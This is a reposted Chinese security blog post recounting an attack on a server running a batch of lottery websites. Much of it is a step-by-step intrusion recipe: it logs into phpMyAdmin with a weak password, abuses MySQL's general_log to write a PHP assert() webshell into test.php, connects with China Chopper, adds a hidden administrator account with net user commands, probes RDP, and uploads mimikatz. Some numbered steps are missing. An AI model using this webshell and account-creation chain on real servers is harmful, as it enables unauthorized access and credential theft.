本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!
欢迎各位添加微信号:asj-jacky
加入安世加 交流群 和大佬们一起交流安全技术
START
0x01获取phpmyadmin弱口令
0x02通过phpmyadmin后台sql查询写入webshell到日志文件
命令如下:
1、开启日志功能:set global general_log=on;
这里的日志文件是test.php。
3、执行SQL命令写入一句话到日志文件:
SELECT'<?php assert($_POST["test"]);?>';
5、 查看日志文件。
0x03菜刀连接添加用户并且上传mimikatz
使用菜刀连接日志文件木马,xxx/test.php 密码:test
查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。
命令为:
C:Windowssystem32net.exe user Test Test!@#123 /add
C:Windowssystem32net.exe localgroup administrators Test /add
0x043389连接,读取管理员密码
1、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。
2、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。
第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程
第二步: netstat -ano | findstr **** //查看远程桌面服务进程号对应的端口号。
5、发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:
系统一:
本文始发于微信公众号(安世加):技术干货 | 记一次彩票网站的攻击案例
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论